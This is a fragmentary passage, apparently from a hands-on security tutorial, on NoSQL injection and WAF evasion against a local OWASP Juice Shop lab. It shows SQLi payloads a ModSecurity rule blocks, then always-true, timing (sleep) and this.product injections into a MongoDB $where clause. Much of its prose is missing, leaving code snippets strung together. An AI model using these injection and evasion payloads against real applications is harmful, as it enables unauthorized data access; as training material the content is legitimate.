||, &&, etc.)
Ex: OWASP ModSecurity SQLi rule that blocks:
' || 1=1#
' && 1=1#
' /*!||*/ 1=1#
' /*!&&*/ 1=1#
http://localhost:3000/rest/product/1||true/reviews
1||true
with a value that's unique to Juice Shop
http://localhost:3000/rest/product/INJECT_ME/reviews
INJECT_ME
create different responses
1
or 1||true
docker run -p 3000:3000 securingthestack/juice-shop:nosqli-waf-evasion-fundamentals
USER_INPUT
is being compared to some UNKNOWN_VALUE
UNKNOWN_VALUE
, they can force an always true condition while evading the WAF
USER_INPUT
== UNKNOWN_VALUE
==
a valid assumption? Why not >
, etc. (Hint: Substitute a few integer values in INJECT_ME
)
http://localhost:3000/rest/product/INJECT_ME/reviews
==
comparison
UNKNOWN_VALUE
object (Question)
http://localhost:3000/rest/product/sleep(2000)/reviews
sleep(2000)
was being evaluated?
http://localhost:3000/rest/product/INJECT_ME/reviews
INJECT_ME
is being evaluated within a JavaScript expression that's passed into $where
UNKNOWN_VALUE
, so they can force an always true condition
USER_INPUT
== UNKNOWN_VALUE
$where
context, what object is UNKNOWN_VALUE
?
UNKNOWN_VALUE
object (Answer)
this
or obj
$where
iterates over all documents within a MongoDB collection
this
this.address
this
in the comparison
this.UNKNOWN_VALUE
(Question)
http://localhost:3000/rest/product/INJECT_ME/reviews
INJECT_ME
to this.UNKNOWN_PROPERTY
UNKNOWN_PROPERTY
this.UNKNOWN_VALUE
(Answer)
http://localhost:3000/rest/product/INJECT_ME/reviews
http://localhost:3000/rest/product/this.product/reviews
INJECT_ME
is a random number that's given to each client
Backend Code
this.product